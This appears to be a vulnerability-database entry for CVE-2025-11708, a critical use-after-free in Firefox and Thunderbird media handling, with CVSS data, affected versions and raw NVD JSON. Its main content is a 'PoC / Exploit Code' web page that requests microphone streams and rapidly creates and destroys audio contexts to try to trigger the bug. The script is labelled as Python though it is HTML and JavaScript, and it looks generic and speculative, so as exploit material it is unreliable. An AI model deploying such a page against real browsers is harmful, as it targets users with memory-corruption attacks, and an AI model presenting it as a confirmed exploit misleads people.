Security Vulnerability Report
中文
CVE-2025-11708 CVSS 9.8 CRITICAL

CVE-2025-11708

Published: 2025-10-14 13:15:37
Last Modified: 2026-04-13 15:16:39
Source: [email protected]

Description

Use-after-free in MediaTrackGraphImpl::GetInstance(). This vulnerability was fixed in Firefox 144, Firefox ESR 140.4, Thunderbird 144, and Thunderbird 140.4.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:thunderbird:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:thunderbird:*:*:*:*:*:*:*:* - VULNERABLE
Mozilla Firefox < 144
Mozilla Firefox ESR < 140.4
Mozilla Thunderbird < 144
Mozilla Thunderbird ESR < 140.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-11708 PoC - Firefox MediaTrackGraphImpl::GetInstance() Use-After-Free --> <!-- WARNING: This PoC is for educational and authorized testing purposes only --> <!-- Vulnerability: Use-after-free in MediaTrackGraphImpl::GetInstance() --> <!-- Affected: Firefox < 144, Firefox ESR < 140.4, Thunderbird < 144 --> <!DOCTYPE html> <html> <head> <title>CVE-2025-11708 PoC</title> </head> <body> <h1>CVE-2025-11708 - MediaTrackGraphImpl UAF</h1> <script> // Step 1: Create multiple MediaStream objects to populate MediaTrackGraphImpl async function triggerUAF() { const streams = []; // Create numerous media streams to stress the MediaTrackGraphImpl singleton for (let i = 0; i < 100; i++) { try { const stream = await navigator.mediaDevices.getUserMedia({ audio: true, video: false }); streams.push(stream); } catch (e) { // Permission denied or no device - use synthetic streams break; } } // Step 2: Rapidly create and destroy tracks to trigger race condition // in MediaTrackGraphImpl::GetInstance() for (let i = 0; i < 50; i++) { const audioCtx = new AudioContext(); const oscillator = audioCtx.createOscillator(); const mediaStreamDest = audioCtx.createMediaStreamDestination(); oscillator.connect(mediaStreamDest); oscillator.start(); // Get tracks from the synthetic stream const tracks = mediaStreamDest.stream.getTracks(); // Stop and remove tracks rapidly to trigger UAF tracks.forEach(track => { track.stop(); }); // Force garbage collection hint if (window.gc) { window.gc(); } // Close audio context audioCtx.close(); } // Step 3: Attempt to access the freed MediaTrackGraphImpl instance // by creating new media operations after destruction try { const newAudioCtx = new AudioContext(); const newOscillator = newAudioCtx.createOscillator(); newOscillator.connect(newAudioCtx.destination); newOscillator.start(); newOscillator.stop(); newAudioCtx.close(); } catch (e) { // UAF triggered - may cause crash or code execution console.log("UAF triggered:", e); } } // Trigger the vulnerability triggerUAF(); </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11708", "sourceIdentifier": "[email protected]", "published": "2025-10-14T13:15:36.970", "lastModified": "2026-04-13T15:16:39.173", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Use-after-free in MediaTrackGraphImpl::GetInstance(). This vulnerability was fixed in Firefox 144, Firefox ESR 140.4, Thunderbird 144, and Thunderbird 140.4."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:*", "versionEndExcluding": "140.4.0", "matchCriteriaId": "563626A1-A62C-4F33-A40F-31AC364254E1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:*", "versionEndExcluding": "144.0", "matchCriteriaId": "CEE2F6DA-4331-4D6D-B01B-610DFDBE1833"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:*:*:*:*", "versionEndExcluding": "140.4.0", "matchCriteriaId": "7C6D96D2-1E0E-4A18-B8B1-21F67E1AB441"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:*:*:*:*", "versionStartIncluding": "141.0", "versionEndExcluding": "144.0", "matchCriteriaId": "0BD75942-93B9-47A4-9762-05965EBD7FFF"}]}]}], "references": [{"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=1988931", "source": "[email protected]", "tags": ["Issue Tracking", "Permissions Required"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-81/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-83/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-84/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-85/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://lists.debian.org/debian-lts-announce/2025/10/msg00015.html", "source": "af854a3a-2127-422b-91ae-364da2661108"}, {"url": "https://lists.debian.org/debian-lts-announce/2025/10/msg00031.html", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.